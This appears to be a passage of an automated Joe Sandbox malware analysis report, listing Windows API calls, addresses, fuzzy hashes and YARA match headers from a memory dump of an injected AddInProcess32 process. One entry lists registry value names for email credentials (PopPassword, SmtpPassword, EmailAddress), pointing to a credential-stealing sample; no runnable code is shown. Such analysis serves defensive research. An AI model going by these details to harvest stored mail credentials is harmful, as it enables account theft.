                                                                                                • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                                                                                                • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                                                                                                APIs
                                                                                                • RegCloseKey.KERNEL32(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Close
                                                                                                • String ID:
                                                                                                • API String ID: 3535843008-0
                                                                                                • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                                                                • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                                                                                                • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                                                                                                • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                                                                                                APIs
                                                                                                • PathFileExistsW.SHLWAPI(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExistsFilePath
                                                                                                • String ID:
                                                                                                • API String ID: 1174141254-0
                                                                                                • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                                                                • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                                                                                                • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                                                                                                • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                                                                                                APIs
                                                                                                • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: recv
                                                                                                • String ID:
                                                                                                • API String ID: 1507349165-0
                                                                                                • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                                                                • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                                                                                • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                                                                                • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                                                                                APIs
                                                                                                • closesocket.WS2_32(00404EB0), ref: 00404DEB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: closesocket
                                                                                                • String ID:
                                                                                                • API String ID: 2781271927-0
                                                                                                • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                                                                • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                                                                                                • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                                                                                                • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                                                                                                APIs
                                                                                                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                                                                                  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                                                                                  • Part of subcall function 004044A7: GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?,00000000,F66BE5A2,00000000,00000000), ref: 004044CB
                                                                                                • GetLastError.KERNEL32 ref: 00404585
                                                                                                  • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                                                                                  • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$Process$AllocateErrorFreeLastPrivateProfileString
                                                                                                • String ID:
                                                                                                • API String ID: 4065557613-0
                                                                                                • Opcode ID: 07df6e299c1e51546a6fce8a11171accc3f3248d34e9f20b559e9614b6af16c3
                                                                                                • Instruction ID: 4921b4961515552709d35feb502e82dc384c9b3b90426e204c6f6ec5e0b55acd
                                                                                                • Opcode Fuzzy Hash: 07df6e299c1e51546a6fce8a11171accc3f3248d34e9f20b559e9614b6af16c3
                                                                                                • Instruction Fuzzy Hash: 901157B26011043BEB249EA9AD46F7FB768DF84368F10413FFB05E61D0EA789C00069C
                                                                                                APIs
                                                                                                • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FreeVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 1263568516-0
                                                                                                • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                                                                • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                                                                                                • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                                                                                                • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                                                                                                APIs
                                                                                                • CloseHandle.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle
                                                                                                • String ID:
                                                                                                • API String ID: 2962429428-0
                                                                                                • Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                                                                • Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
                                                                                                • Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
                                                                                                • Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4
                                                                                                APIs
                                                                                                • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID:
                                                                                                • API String ID: 3472027048-0
                                                                                                • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                                                                • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                                                                                                • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                                                                                                • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                                                                                                APIs
                                                                                                • CoInitialize.OLE32(00000000), ref: 0040438F
                                                                                                • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                                                                                                • VariantInit.OLEAUT32(?), ref: 004043C4
                                                                                                • SysAllocString.OLEAUT32(?), ref: 004043CD
                                                                                                • VariantInit.OLEAUT32(?), ref: 00404414
                                                                                                • SysAllocString.OLEAUT32(?), ref: 00404419
                                                                                                • VariantInit.OLEAUT32(?), ref: 00404431
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InitVariant$AllocString$CreateInitializeInstance
                                                                                                • String ID:
                                                                                                • API String ID: 1312198159-0
                                                                                                • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                                                                • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                                                                                                • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                                                                                                • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: QueryValue
                                                                                                • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                                                                                                • API String ID: 3660427363-2111798378
                                                                                                • Opcode ID: b68ba21e4a3a0049e44e4174c680ab59653fe0191a5276204f50c9857b9783d9
                                                                                                • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                                                                                                • Opcode Fuzzy Hash: b68ba21e4a3a0049e44e4174c680ab59653fe0191a5276204f50c9857b9783d9
                                                                                                • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_16_2_400000_AddInProcess32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                                                • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                                                                                                • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                                                                                                • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64